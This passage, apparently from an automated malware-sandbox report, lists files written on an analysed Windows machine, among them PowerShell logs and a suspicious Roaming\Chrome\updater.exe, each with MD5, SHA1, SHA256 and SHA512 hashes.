                      af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      MD5

                      d85ba6ff808d9e5444a4b369f5bc2730

                      SHA1

                      31aa9d96590fff6981b315e0b391b575e4c0804a

                      SHA256

                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                      SHA512

                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      MD5

                      a8e8360d573a4ff072dcc6f09d992c88

                      SHA1

                      3446774433ceaf0b400073914facab11b98b6807

                      SHA256

                      bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

                      SHA512

                      4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

                    • C:\Users\Admin\AppData\Roaming\Chrome\updater.exe

                      MD5

                      8268ff95b3aaea6d6de8f02a73c323d2

                      SHA1

                      ae470145c4f5780315b52aa1c57ae0c04a2d18ca

                      SHA256

                      529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

                      SHA512

                      9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
